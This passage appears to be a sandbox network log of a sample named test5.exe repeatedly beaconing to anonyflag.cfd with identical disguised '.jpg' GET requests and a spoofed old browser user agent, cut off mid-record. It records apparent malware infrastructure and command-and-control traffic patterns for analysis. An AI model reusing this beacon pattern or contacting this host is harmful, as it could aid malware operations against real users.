cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1522&rtt_var=576&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1889967&cwnd=208&unsent_bytes=0&cid=f9eaeb835bdd66c3&ts=506&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:36 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:37 UTC	884	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:37 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:37 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLIMzo3u%2B4x9hDK0Ogn6Uleum%2Fefx2GtBYE%2Be8d1Kd7SIpidHMZeIcqa%2BembNDJnXmEEfMcmb4I%2FObvv1t4WL9V7nSeZqBtBYABm%2FfP%2FKZEvZLGjJVhY2rf018tGQeL9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e90c483ec475-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1510&min_rtt=1508&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1912246&cwnd=181&unsent_bytes=0&cid=250c9720943bb10d&ts=515&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:38 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:39 UTC	875	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:39 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:39 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eie3yGosXK2fAylRWrsGIjZtNqkQLBDWA3rv80xtcZLxkgNdXOi7oPcdpI3DP3ymFG01p3iDd7s3tZwC1LPaAdGW45WgPDNmWCF29xqHcG9ZTqTgJ%2B9EjWm9VIPHRxDF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9189caf7292-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=30168&min_rtt=2045&rtt_var=17563&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1427872&cwnd=252&unsent_bytes=0&cid=806f222cd88a5002&ts=506&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:40 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:41 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:41 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:41 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7otvQyvEaXZVmAILXWkWnajRyS1UCalFwXsU4MNkDxX%2Fqid6GROfx%2BmtgjIHvCBfoBWFtg8uwQ3koz4yf0mtVKPGSn9PWX6f2tHWgLJ14wlXv9zYva%2BvybF%2B61%2F5w7y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9243ef918b8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1856&min_rtt=1759&rtt_var=729&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1660034&cwnd=186&unsent_bytes=0&cid=f18d25662a2cff52&ts=495&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:42 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:43 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:42 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: HIT Age: 1 Last-Modified: Sat, 28 Dec 2024 10:36:41 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3KW63zylEn6xyUxEll%2Fj3rOLWHlwK6mdcOcNiQLynoKNq1GY%2Ff0NCIg7IodVO4aGDJkIp6hupOa2U6TpountSTJmKPFfKIFXR3mMdlvV5skpIJojnq6Slhj18Lpz2m4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9300bbf0f8f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1521&rtt_var=581&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1919789&cwnd=232&unsent_bytes=0&cid=c2ab662a2736ae6b&ts=461&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:44 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:44 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:44 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:44 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkkjG1s4g3XStRMlZ%2F1b7pG4ruHiYWNTiPntOo5ATMdtnjpIiYk5VNpO4z%2F53NlQe2nILi4UqlYWjAWAULtad71%2BIX1NjiIvvtqiGfpBxVik%2B%2FH3IscBbVVfly1O4NbX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e93b4b47420a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1621&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1801357&cwnd=251&unsent_bytes=0&cid=5c5f11aa1b9c1f55&ts=498&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:46 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:46 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:46 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:46 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZPos4l%2FqAb%2BkM3gYXbQ0dFJZZi6Ob7YwScVt4EJI0vRrxCo0t5KK17n4icdTw1xz3bid2iTtNSBiGphvXyGwYfsACBOtr9g8IC%2FBUKQLXPFHS0yMdYfkcI0ZJsFFK30r"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9474dfe7cb2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1779&rtt_var=679&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1596500&cwnd=216&unsent_bytes=0&cid=567ca7236d1bb7a8&ts=513&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:48 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:48 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:48 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:48 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TQ3hLqX0W0NvJePJrfwp5%2F5%2BgEokGjnExTKLRdOzW88cNduwmSWnHs02KWNTLetM9H5J3AlZJFLLsOCMwaCewDJeDQE70zE9YrprosPGO19dKFpOuhVV%2FhyijEuNFaKb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9530fe04339-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1690&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1665715&cwnd=227&unsent_bytes=0&cid=71850ecf5ffb7a90&ts=504&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:50 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:50 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:50 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:50 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pHBul81guKHzzBE9LMtyKBr8dFAZIcaVnHo%2FPDJVI8JVInrh41bRDJleVZbrCMaxq8LGDqE6f85sNH%2FLjhrtCKE4p2yYQUg9jCt3RbkfL0AnRDkBEH6B1O6r2%2FWao1Rx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e95f185443be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2136&min_rtt=2126&rtt_var=818&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1320669&cwnd=226&unsent_bytes=0&cid=bc4371fca6dbd18f&ts=513&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:52 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:52 UTC	877	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:52 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:52 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ob1aifWjkiZrnQvPLMdQH9O14d3j1A68yW%2BHF5Rlg2d6%2FBfd67xggVB0baV%2Bv4jln0DhZYukD7HvPH2ubZDWx6PRS5HAy1dm1wFh8GVhieuCLMpYXkSqhUxKUW%2BNeIZl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e96addfb4273-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1564&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1800246&cwnd=32&unsent_bytes=0&cid=423b3b9eb0e96fb3&ts=502&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49765	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:53 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:54 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:54 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:54 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bCdZkrJAInJ%2FUyRNqa5p8K%2FKP2KOhfm0j3FkOWKmmyu5pRh6b9rLr4rBYrHyMw9yTwc7jaB%2FIn8HNMZQbSpsewHrcGWWAjZNXWDPXr%2Bt44GgNLSmdPWcgTHYrZHT7QT5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9764f658ce8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2005&rtt_var=767&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1412675&cwnd=239&unsent_bytes=0&cid=8c08d9ff814b248e&ts=496&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:55 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:56 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:55 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: HIT Age: 1 Last-Modified: Sat, 28 Dec 2024 10:36:54 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F5t6CTyPZybcT%2Fha4B5TtKvoIhZ7RabqTTtDO4DsgLjfZv524dbk%2BZxBtunluYe7Gcmj267xBmzH%2B03N69qWXpsFZ6nBF8AzmXBMiEJQEYWdTss4bw09vgoUtYauWndb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e981b82143b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1651&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1683967&cwnd=228&unsent_bytes=0&cid=436698efa5558aa5&ts=457&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49768	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:57 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:57 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:57 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:57 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F2l6bO8KMsYI7t7mkQ%2BMKkBYkYu0GdWKDrzjwfG7XlFhGkuk8jj0X1vRmh%2FcOAVxuKxf1X%2B6cx1k0kYU0DOAgIooSnOT5QmG%2Fr3krpxkR0NpbkgyBMsjnBforxqL%2FIVp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e98cf91743b6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2091&min_rtt=2085&rtt_var=794&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1367041&cwnd=224&unsent_bytes=0&cid=4ec937a7b87c4655&ts=494&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49770	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:59 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:59 UTC	872	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:59 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:59 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jqyk%2B5QENgRvulp0D0yOamTd3pZvhoxTXUtDrbGZ6VQo365GnKzuzvvKOlAyx9ON89xw5YZKAc3cWw51Q8BEU76GHakgFHODqMFMr2BygZrhT2H5LaXqZE0YhEvY6m0Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e998a9498c2d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1767&rtt_var=677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1600877&cwnd=247&unsent_bytes=0&cid=69f276104ef5c139&ts=506&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49776	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:01 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:01 UTC	874	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:01 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:01 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TFqxXR4hyvcQopaXS0DJ39Ypv0Q0fATIY5vv3mXl1yR76Sx1pwoeX8ET%2F1eetK3OM6nu5Ho29w8pgC4pMgzzf2POzV0cFaOxf4LDo2GzwSJ7Mjt%2BFFXGE3SnnXRr9YGW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9a4b93a42ce-EWR alt-svc: h3=":443"; ma=86400 server-timing: 